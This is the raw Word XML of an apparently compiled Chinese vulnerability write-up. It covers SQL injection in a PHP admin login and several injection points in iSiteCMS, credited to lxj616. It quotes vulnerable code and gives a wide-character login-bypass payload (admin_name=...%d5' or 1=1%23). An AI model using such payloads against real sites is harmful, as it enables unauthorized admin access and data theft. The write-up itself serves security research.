          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> get_admin_one </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="13"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3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 xml:space="preserve">\admin\include\admin_common.fun.php (237 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="9"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s10043" type="#_x0000_t202" style="position:absolute;margin-left:89.85pt;margin-top:9.7pt;width:319.25pt;height:97.8pt;z-index:212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7" w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="720" w:right="3394" w:hanging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function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get_admin_one($username){ global $db;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2" w:line="285" w:lineRule="auto"/>
                    <w:ind w:right="521" w:firstLine="72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$sql = "select * from ".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table(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'admin')." where admin_name = '".$username."' LIMIT 1"; //</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>同样直接查询了</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="24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return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$db-&gt;getone($sql);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spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="312" w:lineRule="exact"/>
        <w:ind w:left="837" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get_admin_one</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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函数和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> check_admin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数都是直</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接就带入查询了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="16" w:line="344" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="327"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开头被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> addslashes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数过滤过一次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但是在宽字符面前这些都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是浮云</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>~~</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="344" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia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微软雅黑"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="311" w:lineRule="exact"/>
        <w:ind w:left="837" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="iSiteCMS几处注射漏洞"/>
      <w:bookmarkStart w:id="26" w:name="_bookmark12"/>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin_login.php</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?act</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">=do_login  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造以下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句就能</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="344" w:lineRule="exact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直接进后台了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">~~ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当然前提你得有后台路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="39"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>admin_name=fuckyou%d5' or 1=1%23&amp;admin_pwd=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRPr="00623EEB" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="12"/>
          <w:lang w:eastAsia="zh-CN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3"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="12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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Angsana New" w:eastAsia="Angsana New"/>
        </w:rPr>
        <w:t>iSiteCMS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Angsana New" w:eastAsia="Angsana New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>几处注射漏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作者</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>lxj616</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="33"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>File:/isite/components/messages/messages.fe.php line</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>:103</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s10042" type="#_x0000_t202" style="position:absolute;margin-left:89.85pt;margin-top:18.45pt;width:319.25pt;height:48.9pt;z-index:220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8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$form-&gt;status == TFORM_STATUS_GETED_VALID){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="45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这个是站内短信的写信息表单的处理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$arr = $form-&gt;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getValues(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Verdana"/>
          <w:sz w:val="2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41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11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直接获取表单中信息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$tos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explode(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',',trim($arr['to']));</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="48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只是分割，不是过滤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$noExistsMenber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array(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1" w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="540" w:right="346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$toMenbers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array(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 foreach ($tos as $menber){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2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$i =$this-&gt;DBE-&gt;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getOne(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"select `id` from #  user</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-56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where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`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name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`='$menber'");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="48" w:line="280" w:lineRule="auto"/>
                    <w:ind w:right="33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一直到上面这一句都没有过滤，直接带入数据库查询了，之所以会这么写可能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的原因是开发人员误以为</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>`name`='$menber'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>的引号可以起到保护作用（其他的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 xml:space="preserve">int </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>变量都通过了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inval</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>，而这个是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string</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-64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可以输入单引号）</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="31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is_null($i) or empty($i)){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="90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noExistsMenber[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] = $menber;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="47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//id</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-67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只要有返回就可以继续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90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'name'] = $menber;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71"/>
                    <w:ind w:left="90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'id']  = $i;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="90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toMenbers[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] = $m;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 w:line="285" w:lineRule="auto"/>
                    <w:ind w:left="720" w:hanging="180"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrind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!empty($noExistsMenber)){ addGlobalNotice("</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>以下用户不存在：</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>".implode(',',$noExistsMenber));</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="24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msg[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'tos'] = $arr['to'];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msg[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'subject'] = $arr['subject'];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msg[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'content'] = $arr['content'];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="48" w:line="280" w:lineRule="auto"/>
                    <w:ind w:right="213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进入信息发送的模块了，实际上之前就已经引发注射了，但是攻击时需要读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sendMessage</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-73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代码</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="29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$mMessage-&gt;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sendMessage(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$toMenbers,$msg);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="47"/>
                    <w:ind w:left="72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flash(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'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>成功</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>','</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>发送成功</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>',bu(1,'messages','inbox'));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36"/>
                    <w:rPr>
                      <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                    </w:rPr>
                    <w:t>这个就是代码里的表单显</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
                    </w:rPr>
                    <w:t>示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6"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="10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  <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4056825" cy="272195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825" cy="27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8"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="15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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面同理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="104"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s10040" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:19.4pt;width:319.25pt;height:195.6pt;z-index:224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$form-&gt;status == TFORM_STATUS_GETED_VALID){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73" w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="2748" w:right="916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$newCat = $form-&gt;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getValues(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 if($id==0){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="366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//create category</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71"/>
                    <w:ind w:left="366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//check name</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="366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$name = 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newCat[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'name'];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="366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$nameUsed =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$this-&gt;DBE-&gt;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getOne(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"select count(*) from #  link_category</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/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where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`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name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`='$name'");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="366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$nameUsed){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="71"/>
                    <w:ind w:left="457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$form-&gt;status =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TFORM_STATUS_GETED;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/>
        </w:rPr>
        <w:t>/isite/components/links/links.be.php line</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>:64</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>下面是对于攻击方式的分析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注射肯定是有了，但是这里有一点点别扭的地方，就是</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6801"/>
        </w:tabs>
        <w:spacing w:before="79"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:sz w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>$tos =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:spacing w:val="-23"/>
          <w:sz w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:sz w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>explode(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:sz w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>',',trim($arr['to']));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:sz w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda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8"/>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="312" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这句话把逗号给干掉了，给注射添加了小小难度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="477" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s10039" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:53.55pt;width:319.25pt;height:472.7pt;z-index:-368704;mso-position-horizontal-relative:page" fillcolor="#d7d7d7" stroked="f">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="38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function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sendMessage($to,$message,$type=null,$newCall=1){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="45" w:line="302" w:lineRule="auto"/>
                    <w:ind w:left="360" w:right="2510" w:hanging="36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刚才检测完用户是否存在后，调用这个函数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isset($to['name']) or is_string($to)){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="9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is_string($to)){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to[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'name'] = $to;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!isset($to['id'])){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="45"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrind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还记得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id</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-63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吗，是之前被注射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SQL</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:spacing w:val="-65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的返回，理论上正常应该是目标用户的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id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to[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'id'] = $this-&gt;_db-&gt;getOne("select `id` from #  user</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
